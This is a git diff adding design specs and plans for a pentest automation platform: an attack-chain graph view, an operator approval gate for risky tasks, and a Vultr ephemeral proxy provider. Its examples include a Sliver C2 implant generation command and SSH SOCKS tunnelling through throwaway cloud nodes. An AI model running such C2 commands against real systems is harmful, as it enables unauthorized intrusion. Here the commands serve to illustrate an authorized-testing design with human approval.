+        <ForceGraphCanvas
+          :data="graphData"
+          :selected-node-id="selectedNode?.id ?? null"
+          :selected-link-id="selectedLink?.id ?? null"
+          class="flex-1"
+          @node-click="onNodeClick"
+          @link-click="onLinkClick"
+          @background-click="onBackgroundClick"
+        />
+        <ChainDetailPanel
+          :selected-node="selectedNode"
+          :selected-link="selectedLink"
+          :nodes="graphData.nodes"
+          @close="onBackgroundClick"
+          @confirm="onConfirm"
+          @reject="onReject"
+          @expand="onExpand"
+        />
+      </div>
+    </template>
+
+    <!-- Legend -->
+    <ChainLegend
+      :rendered-count="meta.rendered_findings"
+      :total-count="meta.total_findings"
+    />
+  </div>
+</template>
+```
+
+- [ ] **Step 2: Verify the build compiles**
+
+Run: `cd packages/web/frontend && npx vue-tsc --noEmit`
+Expected: no type errors (or only pre-existing ones)
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add packages/web/frontend/src/views/ChainGraphView.vue
+git commit -m "feat(frontend): ChainGraphView — page component with data fetching, curation, expansion"
+```
+
+---
+
+## Task 14: Manual browser verification
+
+**Files:** none (verification only)
+
+- [ ] **Step 1: Start the backend dev server**
+
+Run: `cd packages/web/backend && uvicorn app.main:app --reload --port 8000`
+
+- [ ] **Step 2: Start the frontend dev server**
+
+Run: `cd packages/web/frontend && npm run dev`
+
+- [ ] **Step 3: Verify the flow**
+
+1. Login at `http://localhost:5173/login`
+2. Navigate to an engagement → click "Attack Chain" button
+3. If no chain data: verify empty state appears with "Run Chain Analysis" button
+4. If chain data exists: verify the force-graph renders with nodes and edges
+5. Click a node → verify detail panel opens with finding info and "Expand Neighbors" button
+6. Click an edge → verify detail panel shows reasons, rationale, confirm/reject buttons
+7. Click Confirm/Reject → verify edge style updates optimistically
+8. Toggle severity/status filters → verify graph re-renders with filtered data
+9. Verify legend bar shows correct node count
+
+- [ ] **Step 4: Fix any issues found during verification**
+
+- [ ] **Step 5: Final commit with any fixes**
+
+```bash
+git add -A
+git commit -m "fix(chain-viz): address issues found during browser verification"
+```
+
+---
+
+## Task 15: Run full test suite
+
+**Files:** none (verification only)
+
+- [ ] **Step 1: Run all backend tests**
+
+Run: `cd packages/web/backend && python -m pytest tests/ -v`
+Expected: all tests PASS, including new `test_chain_subgraph.py` and `test_chain_curation.py`
+
+- [ ] **Step 2: Run frontend type check**
+
+Run: `cd packages/web/frontend && npx vue-tsc --noEmit`
+Expected: no new type errors
+
+- [ ] **Step 3: Commit if any test fixes were needed**
+
+```bash
+git add -A
+git commit -m "fix: address test suite issues from 3C.2 integration"
+```
diff --git a/docs/superpowers/specs/2026-04-13-hitl-approval-gate-vultr-provider-design.md b/docs/superpowers/specs/2026-04-13-hitl-approval-gate-vultr-provider-design.md
new file mode 100644
index 0000000..6d10a4c
--- /dev/null
+++ b/docs/superpowers/specs/2026-04-13-hitl-approval-gate-vultr-provider-design.md
@@ -0,0 +1,412 @@
+# HITL Approval Gate + Vultr Provider — Design Spec
+
+**Date:** 2026-04-13
+**Status:** Draft
+**Depends on:** [2026-04-13-dag-mutation-ephemeral-proxy.md](../plans/2026-04-13-dag-mutation-ephemeral-proxy.md) (Phase A + B)
+
+---
+
+## 1. Problem Statement
+
+### 1.1 HITL Approval Gate
+
+OpenTools is an authorized pentest automation platform. Certain execution nodes — dropping a C2 agent, modifying target state, escalating privileges — require explicit operator approval before firing. The engine must suspend a specific task's execution indefinitely (up to a configurable timeout) until a human operator provides an API signal, without blocking the main event loop or holding up parallel safe branches.
+
+### 1.2 Vultr Provider
+
+The existing plan (Phase B) defines a `CloudNodeProvider` ABC with a DigitalOcean implementation. Vultr is the preferred provider for production use. A `VultrProvider` implementation is needed, with explicit SSH key injection to enable immediate automated tunnel establishment on boot.
+
+---
+
+## 2. HITL Approval Gate
+
+### 2.1 Core Invariants
+
+These three rules are non-negotiable. Every code path must enforce them.
+
+1. **Write-before-signal**: The FastAPI route writes the operator's decision to SQLite *before* calling `event.set()`. If the server crashes between the DB write and the signal, the decision is safe in the database.
+
+2. **Read-after-wake**: The gate executor never trusts why it woke up. After `event.wait()` returns (or times out), it always reads the authoritative status from SQLite. The in-memory event is a notification mechanism, not a source of truth.
+
+3. **Database-owned expiry**: `approval_expires_at` is a UTC timestamp persisted to SQLite. On restart, `remaining = expires_at - utcnow()`. If negative, auto-reject. The timer is never held in memory alone.
+
+### 2.2 Execution Wrapper Model (Not a Separate TaskType)
+
+The approval gate is **not** a separate `TaskType`. It is a lifecycle wrapper around any existing task type. This avoids the "two-phase YAML trap" where every gated action requires paired tasks with wired dependencies.
+
+**YAML profile syntax:**
+
+```yaml
+tasks:
+  - id: deploy-agent
+    task_type: shell
+    tool: "c2-agent-drop"
+    command: "sliver generate --mtls 10.0.0.1"
+    depends_on: [nmap-scan]
+    requires_approval:
+      timeout_seconds: 3600
+      description: "Deploy Sliver agent on 10.0.0.1"
+```
+
+One task, one slot, one YAML block. The gate phase runs inside `_execute_task` before the real executor fires. If approved, the coroutine proceeds to shell execution within the same task. If rejected or timed out, it returns a failure code and the branch is skipped.
+
+### 2.3 Model Additions
+
+**New model on `ScanTask`:**
+
+```python
+class ApprovalRequirement(BaseModel):
+    """Gate metadata, defined in YAML profile."""
+    timeout_seconds: int = 3600
+    description: str = ""
+```
+
+**New fields on `ScanTask`:**
+
+```python
+class ScanTask(BaseModel):
+    # ... existing fields ...
+    requires_approval: ApprovalRequirement | None = None
+    approval_ticket_id: str | None = None
+    approval_expires_at: datetime | None = None
+```
+
+**New value in `TaskStatus`:**
+
+```python
+class TaskStatus(StrEnum):
+    # ... existing values ...
+    AWAITING_APPROVAL = "awaiting_approval"
+```
+
+No new `TaskType` enum value. No new executor class.
+
+### 2.4 ApprovalRegistry — In-Memory Notification Hub
+
+The registry is deliberately thin. It holds `asyncio.Event` objects only. No decision state, no metadata, no timestamps — all of that lives in SQLite.
+
+```python
+class ApprovalRegistry:
+    """In-memory notification hub. NOT the source of truth.
+    
+    The sole purpose is to provide a handle for FastAPI routes to wake
+    sleeping gate coroutines. If a ticket is missing (e.g., server
+    restarted before the engine reconstructed it), the route still
+    writes the decision to SQLite — the executor will pick it up on
+    its next DB read.
+    """
+    
+    def __init__(self) -> None:
+        self._events: dict[str, asyncio.Event] = {}
+    
+    def register(self, ticket_id: str) -> asyncio.Event:
+        """Create and store an event for a gate ticket."""
+        event = asyncio.Event()
+        self._events[ticket_id] = event
+        return event
+    
+    def signal(self, ticket_id: str) -> bool:
+        """Signal the event if it exists. Returns False if not in registry."""
+        event = self._events.get(ticket_id)
+        if event is None:
+            return False
+        event.set()
+        return True
+    
+    def remove(self, ticket_id: str) -> None:
+        """Clean up after a gate resolves."""
+        self._events.pop(ticket_id, None)
+```
+
+Singleton instance: shared between `ScanEngine` (registers + awaits) and FastAPI routes (signals).
+
+### 2.5 Engine Integration — Gate Phase in `_execute_task`
+
+The gate phase inserts into the existing `_execute_task` method, between resource acquisition and executor dispatch:
+
+```
+_execute_task(task, executor):
+  1. Cache check                          ← existing
+  2. IF task.requires_approval:
+       acquire from "approval_gate" group (9999 limit)
+     ELSE:
+       acquire from task's normal resource group   ← existing
+  3. ── GATE PHASE (if task.requires_approval) ──
+     a. ticket_id = f"gate-{task.id}-{uuid4().hex[:8]}"
+     b. expires_at = utcnow() + timedelta(seconds=timeout)
+     c. PERSIST to SQLite:
+          task.status = AWAITING_APPROVAL
+          task.approval_ticket_id = ticket_id
+          task.approval_expires_at = expires_at
+     d. Publish SSE event: "approval_required"
+     e. Register event in ApprovalRegistry
+     f. remaining = (expires_at - utcnow()).total_seconds()
+     g. try:
+          await asyncio.wait_for(event.wait(), timeout=remaining)
+        except asyncio.TimeoutError:
+          pass  # handled below
+     h. READ TRUTH from SQLite:
+          status == 'approved'  → proceed to step 4
+          status == 'rejected'  → return TaskOutput(exit_code=1,
+                                    stderr="rejected by operator")
+          still 'awaiting_approval' → timeout expired
+                                    → write 'approval_expired' to SQLite
+                                    → return TaskOutput(exit_code=2,
+                                        stderr="approval expired")
+     i. Cleanup: registry.remove(ticket_id)
+     j. Release "approval_gate" resource group
+     k. Re-acquire from task's normal resource group
+  4. Execute via real executor             ← existing
+  5. Resource release                      ← existing
+  6. Cache result                          ← existing
+```
+
+### 2.6 Resource Pool Configuration
+
+```python
+pool = AdaptiveResourcePool(
+    global_limit=10,
+    group_limits={
+        "approval_gate": 9999,   # sleeping coroutines: ~0 CPU, ~bytes RAM
+    },
+)
+```
+
+During the gate phase, the task holds one slot from the `approval_gate` group (effectively unlimited). After approval, it releases that slot and acquires from its normal resource group before executing. This means 500 sleeping gates consume zero capacity from the real worker pool.
+
+### 2.7 FastAPI Routes
+
+Three new endpoints on the existing scan router:
+
+**List pending gates:**
+```
+GET /api/v1/scans/{scan_id}/gates
+
+Response: {
+  "gates": [
+    {
+      "ticket_id": "gate-deploy-agent-a1b2c3d4",
+      "task_id": "deploy-agent",
+      "tool": "c2-agent-drop",
+      "command": "sliver generate --mtls 10.0.0.1",
+      "description": "Deploy Sliver agent on 10.0.0.1",
+      "status": "awaiting_approval",
+      "created_at": "2026-04-13T14:00:00Z",
+      "expires_at": "2026-04-13T15:00:00Z"
+    }
+  ]
+}
+```
+
+**Approve a gate:**
+```
+POST /api/v1/scans/{scan_id}/gates/{ticket_id}/approve
+
+Sequence:
+  1. Validate ticket exists in SQLite with status='awaiting_approval'
+  2. UPDATE scan_tasks SET status='approved' WHERE approval_ticket_id=?
+  3. registry.signal(ticket_id)  — may return False if engine restarted
+  4. Return 200 {"ticket_id": "...", "decision": "approved"}
+```
+
+**Reject a gate:**
+```
+POST /api/v1/scans/{scan_id}/gates/{ticket_id}/reject
+Body: {"reason": "Target out of scope"}  (optional)
+
+Sequence:
+  1. Validate ticket exists in SQLite with status='awaiting_approval'
+  2. UPDATE scan_tasks SET status='rejected' WHERE approval_ticket_id=?
+  3. registry.signal(ticket_id)
+  4. Return 200 {"ticket_id": "...", "decision": "rejected"}
+```
+
+All three routes enforce write-before-signal. The `registry.signal()` call is best-effort — if the event isn't in the registry (restart race), the gate executor will read the decision from SQLite on its next DB poll or restart reconstruction.
+
+### 2.8 SSE Event Payload
+
+Published when a gate enters the waiting state:
+
+```json
+{
+  "type": "approval_required",
+  "data": {
+    "ticket_id": "gate-deploy-agent-a1b2c3d4",
+    "task_id": "deploy-agent",
+    "scan_id": "scan-1",
+    "tool": "c2-agent-drop",
+    "command": "sliver generate --mtls 10.0.0.1",
+    "description": "Deploy Sliver agent on 10.0.0.1",
+    "expires_at": "2026-04-13T15:00:00Z"
+  }
+}
+```
+
+The `command` field is pulled directly from the task's own context — because the gate *is* the task, not a separate checkpoint. The operator sees exactly what they're approving.
+
+### 2.9 Restart / Durable Resume
+
+On engine startup:
+
+1. Query SQLite: `SELECT * FROM scan_tasks WHERE status IN ('awaiting_approval', 'approved') AND scan_id = ?`
+2. For each `awaiting_approval` task:
+   - `remaining = approval_expires_at - utcnow()`
+   - If `remaining <= 0`: write `status='approval_expired'`, mark failed, skip dependents
+   - If `remaining > 0`: create fresh `asyncio.Event`, register in `ApprovalRegistry`, re-enter gate wait with `timeout=remaining`
+3. For each `approved` task (decision was persisted before crash):
+   - Skip gate phase entirely, dispatch directly to the real executor
+4. `rejected` / `approval_expired` tasks: already terminal, skip as normal
+
+### 2.10 Crash Safety Matrix
+
+| Crash point | DB state after crash | Restart behavior |
+|---|---|---|
+| After gate persists AWAITING, before operator acts | `awaiting_approval` + `expires_at` | Re-enter wait with remaining time |
+| After operator approves (DB written), before event.set() | `approved` | Skip gate, execute immediately |
+| After event.set(), before executor reads DB | `approved` | Skip gate, execute immediately |
+| After executor reads DB, before shell execution starts | `approved` | Re-dispatch to shell executor |
+| After shell execution completes | `completed` | Normal — nothing to resume |
+| During timeout expiry handling | `awaiting_approval` | Re-check timeout, auto-expire |
+
+Every row is safe. The database is always the source of truth.
+
+---
+
+## 3. Vultr Provider
+
+### 3.1 Overview
+
+`VultrProvider` implements the `CloudNodeProvider` ABC from Phase B. It provisions ephemeral Vultr instances via their REST API using `httpx.AsyncClient`. The implementation mirrors `DigitalOceanProvider` in structure but targets the Vultr API.
+
+### 3.2 SSH Key Requirement
+
+The orchestrator must establish an automated SSH tunnel (`ssh -D 1080 -N root@<ip>`) the instant `main_ip` is active. This requires the orchestrator's public key to be pre-registered in Vultr and passed as `sshkey_id` in the instance creation payload.
+
+**Prerequisite:** The operator registers their SSH public key in Vultr's dashboard or via `POST /v2/ssh-keys` and records the returned key ID. This ID is passed to `VultrProvider` at construction time.
+
+**If `sshkey_id` is missing from the creation payload**, the instance boots with no authorized keys. The SSH tunnel will fail with `Permission denied (publickey)` and the entire proxy lifecycle fails. This is not a soft dependency — it is a hard requirement.
+
+### 3.3 API Mapping
+
+| Operation | Endpoint | Method |
+|---|---|---|
+| Create instance | `https://api.vultr.com/v2/instances` | POST |
+| Poll status | `https://api.vultr.com/v2/instances/{id}` | GET |
+| Destroy instance | `https://api.vultr.com/v2/instances/{id}` | DELETE |
+| List by tag | `https://api.vultr.com/v2/instances?tag={tag}` | GET |
+
+### 3.4 Create Payload
+
+```json
+{
+  "region": "ewr",
+  "plan": "vc2-1c-0.5gb",
+  "os_id": 2284,
+  "label": "ot-proxy-a1b2c3d4",
+  "sshkey_id": ["ssh-key-uuid-from-vultr"],
+  "tags": ["opentools-ephemeral-proxy", "scan:scan-1"],
+  "backups": "disabled",
+  "activation_email": false
+}
+```
+
+**Field details:**
+
+- `region`: Vultr region slug (e.g., `"ewr"` for New Jersey, `"lax"` for Los Angeles). Passed through from `CloudNodeProvider.create_node(region=...)`.
+- `plan`: `"vc2-1c-0.5gb"` — the cheapest Vultr Cloud Compute tier. 1 vCPU, 0.5 GB RAM, 10 GB SSD. Billed hourly, destroyed after use.
+- `os_id`: `2284` = Ubuntu 24.04 LTS. Numeric ID required by the Vultr API (not a slug).
+- `label`: Human-readable name with random suffix for identification.
+- `sshkey_id`: **Required array of Vultr SSH key UUIDs.** These keys are injected into `/root/.ssh/authorized_keys` during instance provisioning via cloud-init. Without this, the SSH tunnel cannot authenticate.
+- `tags`: Used by the orphan sweeper to identify and clean up nodes from crashed runs.
+- `backups`: Disabled — ephemeral nodes don't need backup snapshots.
+- `activation_email`: Disabled — suppress Vultr's default activation notification spam.
+
+### 3.5 Poll Response Parsing
+
+```json
+{
+  "instance": {
+    "id": "cb676a46-66fd-4dfb-b839-443f2e6c0b60",
+    "status": "active",
+    "power_status": "running",
+    "main_ip": "149.28.xxx.xxx",
+    "label": "ot-proxy-a1b2c3d4",
+    "region": "ewr",
+    "plan": "vc2-1c-0.5gb",
+    "tags": ["opentools-ephemeral-proxy"]
+  }
+}
+```
+
+**Status mapping:**
+
+| Vultr `status` | `CloudNodeProvider` status |
+|---|---|
+| `"pending"` | `"creating"` |
+| `"active"` (with `power_status == "running"` and `main_ip != "0.0.0.0"`) | `"active"` |
+| `"active"` (with `main_ip == "0.0.0.0"`) | `"creating"` (IP not yet assigned) |
+| Any other | `"creating"` |
+
+**Important:** Vultr can report `status: "active"` before the IP is assigned. The provider must check `main_ip != "0.0.0.0"` before returning `"active"`.
+
+### 3.6 Destroy (Idempotent)
+
+```
+DELETE /v2/instances/{id}
+```
+
+- `204`: Successfully destroyed
+- `404`: Already gone — idempotent, do not raise
+
+### 3.7 List by Tag (for Orphan Sweeper)
+
+```
+GET /v2/instances?tag=opentools-ephemeral-proxy
+```
+
+Returns all instances with the proxy tag. The orphan sweeper iterates and destroys each. `VultrProvider` implements the optional `list_nodes_by_tag(tag: str) -> list[str]` method that the sweeper calls.
+
+### 3.8 Constructor
+
+```python
+class VultrProvider(CloudNodeProvider):
+    def __init__(self, client: httpx.AsyncClient) -> None:
+        self._client = client
+
+    @classmethod
+    def from_token(cls, api_token: str) -> VultrProvider:
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            headers={"Authorization": f"Bearer {api_token}"},
+            timeout=30.0,
+        )
+        return cls(client=client)
+```
+
+The `ssh_public_key` parameter in `create_node(region, ssh_public_key, tags)` maps directly to `sshkey_id` in the Vultr payload. The caller passes the Vultr SSH key UUID (pre-registered), not the raw public key content.
+
+---
+
+## 4. Integration Points
+
+### 4.1 Where These Fit in the Existing Plan
+
+| Addition | Integrates into | Type |
+|---|---|---|
+| HITL Approval Gate | Phase C (new phase) | Tasks 10-13 |
+| Vultr Provider | Phase B, Task 6b (new task) | After Task 6 |
+
+### 4.2 Dependencies
+
+- The Approval Gate depends on Phase A (engine exists with mutation support) but NOT on Phase B (proxy routing). It can be built independently.
+- The Vultr Provider depends on Phase B's `CloudNodeProvider` ABC (Task 6) being in place.
+- Neither depends on the other.
+
+---
+
+## 5. Out of Scope
+
+- **Approve-with-modification** (operator edits command before approving) — deferred to V2.
+- **Multi-approver workflows** (require 2-of-3 operators to approve) — deferred to V2.
+- **Dashboard UI for approval gates** — the SSE events and API endpoints are sufficient for V1. A dedicated UI can be built against them later.
+- **Vultr SSH key registration automation** — the key must be pre-registered in Vultr. Automating `POST /v2/ssh-keys` is out of scope for V1.
diff --git a/docs/superpowers/specs/2026-04-13-phase3c2-attack-chain-graph-view-design.md b/docs/superpowers/specs/2026-04-13-phase3c2-attack-chain-graph-view-design.md
new file mode 100644
index 0000000..465b1ad
--- /dev/null
+++ b/docs/superpowers/specs/2026-04-13-phase3c2-attack-chain-graph-view-design.md
@@ -0,0 +1,358 @@
+# Phase 3C.2: Per-Engagement Attack Chain Graph View — Design Specification
+
+**Date:** 2026-04-13
+**Status:** Draft
+**Author:** slabl + Claude
+**Depends on:** Phase 3C.1 (merged)
+
+## 1. Overview
+
+Phase 3C.2 adds an interactive, per-engagement attack chain graph visualization to the web dashboard. Users explore how findings relate to each other within an engagement — clicking nodes to inspect findings, hovering edges to see linking reasons, and confirming or rejecting candidate links to curate the graph.
+
+The visualization uses `force-graph` (vasturiano) rendered on a standalone page. Scale is handled server-side: the backend filters and caps the subgraph so the renderer always gets a manageable dataset regardless of engagement size.
+
+No global cross-engagement view (3C.3), no Cypher DSL (3C.4), no Bayesian calibration (3C.3).
+
+## 2. Decisions
+
+| Decision | Choice | Rationale |
+|---|---|---|
+| Graph library | `force-graph` (vasturiano) | Purpose-built force-directed graph renderer, ~50KB, rich interaction API, existing `to_force_graph()` adapter from 3C.1 |
+| Single library | Yes — no cosmograph fallback | Scale is solved server-side via filtering and max_nodes cap; the renderer never sees more than ~1,000 nodes. A second library adds maintenance burden for a problem the backend already solves |
+| Page placement | Standalone page at `/engagements/:id/chain` | Force-graph needs maximum viewport; a tab would constrain height. Graph curation is a focused workflow, not a quick-glance tab |
+| Node coloring | Severity-based (critical=red, high=orange, medium=yellow, low=blue, info=gray) | Consistent with existing `SeverityBadge.vue` palette. MITRE phase shown as small abbreviation pill, not primary color |
+| MITRE ATT&CK display | Small tactic abbreviation pill on nodes (e.g. "IA", "EX", "PE"), not swim lanes | Swim lanes constrain layout and add complexity; deferred to 3C.3 as optional layout mode |
+| Edge curation scope | Global (user-scoped) | `FindingRelation` unique constraint is `(source, target, user_id)`. One edge, one status. Consistent across views. Required for 3C.3 Bayesian calibration |
+| Detail panel | Right-side drawer (30% width) | Curation requires stable surface for reasons/rationale + confirm/reject buttons. Popovers are too transient |
+| Post-curation update | Optimistic local update | Re-fetching would reset the force simulation and destroy the user's spatial mental model |
+| Filter changes | Re-fetch with position preservation | Pin `fx`/`fy` on nodes present in both old and new datasets. New nodes animate in from neighbors. Removed nodes fade out |
+| Neighborhood expansion | Explicit "Expand Neighbors" button in detail panel | Avoids ambiguous double-click. Button shows neighbor count. Fetches via `seed_finding_id` + `hops` params |
+
+## 3. Architecture
+
+### 3.1 Data flow
+
+```
+EngagementDetailView                    ChainGraphView (standalone page)
+  [View Attack Chain] ──────────────►  GET /api/chain/subgraph?engagement_id=X
+                                            &severity=critical,high
+                                            &status=auto_confirmed,user_confirmed,candidate
+                                            &max_nodes=500
+                                                │
+                                                ▼
+                                        to_force_graph() adapter
+                                                │
+                                                ▼
+                                        force-graph renderer
+                                                │
+                                      ┌─────────┴──────────┐
+                                      ▼                     ▼
+                               node click              edge click
+                                      │                     │
+                                      ▼                     ▼
+                              Detail panel:          Detail panel:
+                              finding info,          reasons, rationale,
+                              entities,              drift badge,
+                              [Expand Neighbors]     [Confirm] [Reject]
+                                      │                     │
+                                      ▼                     ▼
+                              GET subgraph           PATCH /api/chain/relations/:id
+                              (seed + hops,          {status: "user_confirmed"}
+                               merge into graph)     (optimistic local update)
+```
+
+### 3.2 No new database tables
+
+Everything builds on existing 3C.1 tables: `ChainFindingRelation`, `ChainEntity`, `ChainEntityMention`. The `RelationStatus` enum already includes `USER_CONFIRMED` and `USER_REJECTED`. The only addition is a computed `drift` boolean derived from comparing current `reasons_json` against `confirmed_at_reasons_json`.
+
+## 4. Backend API
+
+### 4.1 `GET /api/chain/subgraph`
+
+Returns a filtered, capped subgraph for an engagement.
+
+**Query parameters:**
+
+| Param | Type | Default | Description |
+|-------|------|---------|-------------|
+| `engagement_id` | string | required | Engagement to query |
+| `severity` | comma-separated | all | Filter nodes by severity |
+| `status` | comma-separated | `auto_confirmed,user_confirmed,candidate` | Filter edges by relation status |
+| `max_nodes` | int | 500 | Hard cap on returned nodes |
+| `seed_finding_id` | string | null | Start from this node's neighborhood (for expansion). When set, `max_nodes` still applies to the neighborhood result. |
+| `hops` | int | 2 | Neighborhood radius when `seed_finding_id` is provided |
+| `format` | string | `force-graph` | `force-graph` or `canonical` |
+
+**Response (force-graph format):**
+
+```json
+{
+  "graph": {
+    "nodes": [
+      {
+        "id": "f-abc",
+        "name": "SQL Injection in /login",
+        "severity": "critical",
+        "tool": "sqlmap",
+        "phase": "initial-access"
+      }
+    ],
+    "links": [
+      {
+        "id": "rel-123",
+        "source": "f-abc",
+        "target": "f-def",
+        "value": 0.82,
+        "status": "auto_confirmed",
+        "drift": false,
+        "reasons": ["shared_strong_entity", "temporal"],
+        "relation_type": "enables",
+        "rationale": "Both findings target the same host (10.0.0.5) with temporal proximity..."
+      }
+    ]
+  },
+  "meta": {
+    "total_findings": 1832,
+    "rendered_findings": 247,
+    "filtered": true,
+    "generation": 3
+  }
+}
+```
+
+**Implementation:** new method on `ChainService` that delegates to `PostgresChainStore` for the filtered query, runs `to_force_graph()` adapter, computes drift on each relation, and attaches metadata.
+
+**Link objects include `id`** so the frontend can issue `PATCH` requests for curation without reverse-looking up by source+target.
+
+**Drift computation:** for each link with status `user_confirmed`, compare `reasons_json` to `confirmed_at_reasons_json`. If they differ, `drift: true`. Computed server-side in the DTO layer, not pushed to the frontend to diff.
+
+### 4.2 `PATCH /api/chain/relations/{relation_id}`
+
+Updates edge status for curation.
+
+**Request:**
+
+```json
+{
+  "status": "user_confirmed"
+}
+```
+
+**Validation:** only `user_confirmed` and `user_rejected` are accepted. Attempting to set `auto_confirmed`, `candidate`, or `rejected` returns 422.
+
+**Response:** the updated relation object with new status.
+
+**Side effect:** when setting `user_confirmed`, snapshot current `reasons_json` into `confirmed_at_reasons_json` (for future drift detection).
+
+**Auth:** scoped to current user's relations. Returns 404 if the relation belongs to another user.
+
+### 4.3 Existing endpoints used as-is
+
+- `POST /api/chain/rebuild` — trigger chain analysis for the engagement
+- `GET /api/chain/runs/{run_id}` — poll rebuild progress
+
+## 5. Frontend
+
+### 5.1 Page layout
+
+```
+┌─────────────────────────────────────────────────────────────────────┐
+│  ← Back    Engagement Name    [Run Analysis]  [Severity] [Status]  │
+├──────────────────────────────────────────────────┬──────────────────┤
+│                                                  │                  │
+│                                                  │   Detail Panel   │
+│                                                  │                  │
+│              force-graph canvas                  │   (node or edge  │
+│              (fills remaining height)            │    details)      │
+│                                                  │                  │
+│                                                  │   [Confirm]      │
+│                                                  │   [Reject]       │
+│                                                  │                  │
+│                                                  │   [Expand        │
+│                                                  │    12 Neighbors] │
+│                                                  │                  │
+├──────────────────────────────────────────────────┴──────────────────┤
+│  ● Critical ● High ● Medium ● Low ● Info                           │
+│  ── Confirmed  ╌╌ Candidate  ── Rejected   Showing 247 of 1,832    │
+└─────────────────────────────────────────────────────────────────────┘
+```
+
+- **Graph area:** ~70% width when detail panel is open, 100% when closed. Full viewport height minus toolbar and legend bar.
+- **Detail panel:** right-side drawer, ~30% width. Opens on node/edge click, closes on X or clicking empty canvas.
+- **Legend bar:** bottom strip, always visible. Severity color key, edge style key, filtered/total node count.
+
+### 5.2 Node rendering
+
+Custom `nodeCanvasObject` callback:
+
+- **Shape:** filled circle, radius scaled by connection count (capped to avoid giant nodes)
+- **Color:** severity-mapped — critical: `#e74c3c`, high: `#e67e22`, medium: `#f1c40f`, low: `#3498db`, info: `#95a5a6`. Matches `SeverityBadge.vue` palette.
+- **Label:** finding title, truncated to ~30 chars, rendered below node. Hidden at low zoom, always shown on hover.
+- **MITRE pill:** small tactic abbreviation (e.g. "IA", "EX", "PE") top-right of node. Visible at medium+ zoom.
+- **Selection indicator:** bright highlight ring (thicker stroke, contrasting color) when selected.
+
+### 5.3 Edge rendering
+
+Custom `linkCanvasObject` callback:
+
+| Status | Style |
+|--------|-------|
+| `auto_confirmed` | Solid line, opacity proportional to weight |
+| `user_confirmed` | Solid line, full opacity, slightly thicker |
+| `candidate` | Dashed line, lower opacity |
+| `rejected` / `user_rejected` | Thin red dashed line (hidden by default filter) |
+
+- **Direction:** small arrowhead at target end
+- **Drift badge:** small warning triangle (▲) at edge midpoint when `drift: true`
+- **Selection indicator:** thicker line with glow effect when selected
+
+### 5.4 Interactions
+
+| Action | Result |
+|--------|--------|
+| Click node | Open detail panel with finding info (title, severity, tool, phase, linked entities, neighbor count). Show "Expand N Neighbors" button. |
+| Click edge | Open detail panel with weight, status, all firing rule reasons with individual weight contributions, LLM rationale (if present), drift warning (if applicable). Show Confirm/Reject buttons. |
+| Hover node | Tooltip with title + severity. Highlight connected edges. |
+| Hover edge | Tooltip with weight + status + primary reason. |
+| Click empty canvas | Close detail panel. Deselect current node/edge. |
+| Scroll | Zoom in/out. Node labels appear/hide based on zoom level threshold. |
+| Drag node | Reposition (force-graph handles natively). |
+
+### 5.5 Neighborhood expansion
+
+1. User clicks node → detail panel shows "Expand N Neighbors" button with count
+2. User clicks button
+3. Frontend calls `GET /api/chain/subgraph?seed_finding_id=X&hops=2` with current severity/status filters
+4. Merge response into existing graph data (deduplicate nodes/links by ID)
+5. New nodes animate in from the seed node's position (force simulation handles naturally)
+6. Legend bar node count updates
+
+### 5.6 Edge curation flow
+
+1. User clicks an edge → detail panel opens
+2. Panel shows: source finding title → target finding title, weight, status badge, each rule reason with its weight contribution, LLM rationale (if any), drift warning (if any)
+3. User clicks Confirm or Reject
+4. `PATCH /api/chain/relations/:id` fires
+5. Optimistic update: edge style changes immediately (e.g. dashed candidate → solid confirmed)
+6. On error: revert edge style, show PrimeVue toast with error message
+
+### 5.7 Filter toolbar
+
+Integrated into the top toolbar row:
+
+- **Severity toggles:** PrimeVue `SelectButton` (multi-select) for critical/high/medium/low/info. Default: all on.
+- **Status toggles:** PrimeVue `SelectButton` (multi-select) for confirmed/candidate/rejected. Default: confirmed + candidate on.
+- **Reset button:** restores default filter state.
+
+Changing any filter re-fetches `GET /api/chain/subgraph` with updated params. On re-fetch, nodes present in both old and new datasets preserve their `fx`/`fy` positions. New nodes animate in. Removed nodes are dropped.
+
+### 5.8 Empty state
+
+When engagement has zero chain relations:
+
+- Centered empty-state component: icon + "No attack chain data yet"
+- "Run Chain Analysis" primary button
+- Click triggers `POST /api/chain/rebuild` with `engagement_id`
+- Progress bar appears, polls `GET /api/chain/runs/:id` every 2 seconds
+- On completion (`status: "done"`), auto-fetches subgraph and renders graph
+- On failure, shows error toast with the run's error message
+
+### 5.9 Navigation
+
+- **Entry point:** "View Attack Chain" button added to `EngagementDetailView.vue` header (next to the Delete button)
+- **Route:** `/engagements/:id/chain` added to router
+- **Back navigation:** "← Back" button in toolbar navigates to `/engagements/:id`
+
+### 5.10 Vue components
+
+| Component | Purpose | Est. lines |
+|-----------|---------|------------|
+| `ChainGraphView.vue` | Page component — data fetching, filter state, layout orchestration | ~200 |
+| `ForceGraphCanvas.vue` | Wrapper around `force-graph` instance — rendering config, custom draw callbacks, interaction events | ~300 |
+| `ChainDetailPanel.vue` | Right drawer — node details, edge details with reasons, curation buttons | ~250 |
+| `ChainFilterToolbar.vue` | Severity/status toggle buttons | ~80 |
+| `ChainLegend.vue` | Bottom bar — severity color key, edge style key, node count | ~60 |
+| `ChainEmptyState.vue` | Empty state + rebuild progress | ~80 |
+
+## 6. Testing
+
+### 6.1 Backend tests
+
+- **Subgraph endpoint:** filter combinations (severity subset, status subset, max_nodes cap), seed + hops neighborhood query, empty engagement (no findings), engagement with findings but no chain data (no relations), format parameter (force-graph vs canonical)
+- **Relation PATCH:** valid transitions (candidate → user_confirmed, candidate → user_rejected, user_confirmed → user_rejected, user_rejected → user_confirmed), invalid status values return 422, auth scoping (404 for another user's relation), `confirmed_at_reasons_json` snapshot on confirm
+- **Drift computation:** relation with unchanged reasons → `drift: false`, relation with changed reasons since confirm → `drift: true`, relation never confirmed → `drift: false`
+- **Rebuild → subgraph integration:** trigger rebuild, poll to completion, fetch subgraph, verify non-empty nodes and edges
+
+### 6.2 Frontend tests
+
+- **`ChainDetailPanel`:** renders node details (title, severity, tool, phase, entity list, neighbor count), renders edge details (weight, status, reasons with contributions, rationale, drift badge), confirm/reject buttons emit correct events with relation ID
+- **`ChainFilterToolbar`:** toggle state management, emits filter change event with correct severity/status arrays
+- **`ChainEmptyState`:** shows rebuild button, shows progress bar during polling
+- **`ForceGraphCanvas`:** no unit tests (canvas rendering not testable in jsdom). Manual browser verification.
+
+## 7. Scope boundaries
+
+### 7.1 In scope (3C.2)
+
